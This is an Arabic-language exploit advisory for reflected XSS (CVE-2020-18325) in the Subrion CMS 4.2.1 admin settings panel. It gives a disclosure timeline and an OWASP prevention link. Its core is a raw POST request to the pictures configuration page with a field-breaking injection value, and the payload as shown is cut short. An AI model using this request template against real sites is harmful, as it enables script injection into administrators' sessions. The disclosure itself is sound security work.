
إثبات مفهوم لاستغلال ثغرات XSS المنعكسة في لوحة إعدادات Subrion CMS الإصدار 4.2.1، مع توضيح حقن JavaScript عبر طلبات POST.
Subrion CMS سهل التثبيت وبسيط الإدارة. استخدمه كتطبيق مستقل أو بالاشتراك مع تطبيقات أخرى لإنشاء مواقع مستوى الدخول، أو مواقع متوسطة الحجم أو كبيرة.
تم اكتشاف نقاط ضعف متعددة من نوع Cross-site Scripting المنعكسة في لوحة إعدادات Subrion CMS v.4.2.1، مما يسمح لمهاجم عن بعد بحقن JavaScript عشوائي.
التاريخ: 27-02-2022
رابط البرنامج: https://subrion.org
مؤلف الاستغلال: HaMM0nz
CVE: CVE-2020-18325
التصنيف: تطبيق ويب
الروابط المتأثرة
POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/
Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623
Content-Length: 5605
Connection: close
Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded
Upgrade-Insecure-Requests: 1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"
t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"
75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
test">1qazx
الاكتشاف والإبلاغ : 24 يونيو 2019
تم تعيين معرف CVE : 11 أغسطس 2021
عام : 27 فبراير 2022
ضع في اعتبارك الامتثال لإرشادات منع XSS من OWASP. (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)